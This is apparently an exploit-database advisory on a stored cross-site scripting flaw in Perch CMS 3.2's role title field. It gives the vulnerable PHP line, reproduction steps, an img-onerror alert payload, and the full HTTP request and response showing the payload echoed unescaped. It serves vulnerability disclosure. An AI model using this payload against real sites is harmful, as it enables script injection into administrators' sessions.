Perch CMS 3.2 Cross Site Scripting

2023.08.02
Credit: Andrey Stoykov
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: # Date: 07/2023 # Exploit Author: Andrey Stoykov # Version: 3.2 # Tested on: Windows Server 2022 # Blog: http://msecureltd.blogspot.com XSS #1: File: roles.edit.post.php Line #57: [...] <div class="field-wrap <?php echo $Form->error('roleTitle', false);?>"> <?php echo $Form->label('roleTitle', 'Title'); ?> <div class="form-entry"> <?php echo $Form->text('roleTitle', $Form->get($details, 'roleTitle')); ?> </div> </div> [...] Steps to Reproduce: 1. Login to application 2. Go to Roles 3. Select Title 4. Enter payload TEST"><img src=x onerror=alert(1)> // HTTP POST request POST /perch/perch/core/users/roles/edit/?id=1 HTTP/1.1 Host: 192.168.1.11 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 [...] roleTitle=TEST%22%3e%3cimg+src%3dx+onerror%3dalert%281%29%3e&privs-perch%5b%5d=1&btnsubmit=Save+changes&formaction=core&token=0389a6698f1911a162fdb71328dd2af0 // HTTP response HTTP/1.1 200 OK Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4 [...] [...] <a href="/perch/perch/core/users/roles/edit/?id=1">TEST"><img src=x onerror=alert(1)></a> [...]


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top